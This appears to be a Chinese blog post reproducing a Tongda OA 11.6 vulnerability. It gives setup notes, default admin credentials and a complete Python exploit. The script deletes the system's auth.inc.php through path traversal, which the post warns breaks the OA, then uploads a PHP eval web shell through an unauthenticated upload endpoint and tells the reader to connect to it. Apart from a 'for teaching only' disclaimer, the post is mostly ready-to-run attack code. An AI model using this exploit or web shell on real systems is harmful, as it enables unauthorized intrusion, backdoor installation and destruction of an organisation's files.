本片文章仅用于教学请不要用于非法用途
漏洞影响版本
TDOA11.6
漏洞环境
TDOA11.6
复现
本片EXP复现存在风险,使用后会造成OA系统无法使用
安装
安装包:https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe
一直下一步傻瓜式安装即可
用户名:admin 密码:空
登录后截图
EXP
import requests target="url" # 修改url参数 payload="<?php eval($_POST['3838']);?>" # 一句话木马 print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA") input("Press enter to continue") print("[*]Deleting auth.inc.php....") url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url) print("[*]Checking if file deleted...") url=target+"/inc/auth.inc.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1) print("[+]Successfully deleted auth.inc.php!") print("[*]Uploading payload...") url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" files = {'FILE1': ('dadada.php', payload)} requests.post(url=url,files=files) url=target+"/_dadada.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url) else: print("[-]Failed to upload file")View Code
本片EXP复现存在风险,使用后会造成OA系统无法使用
python td.py
链接shell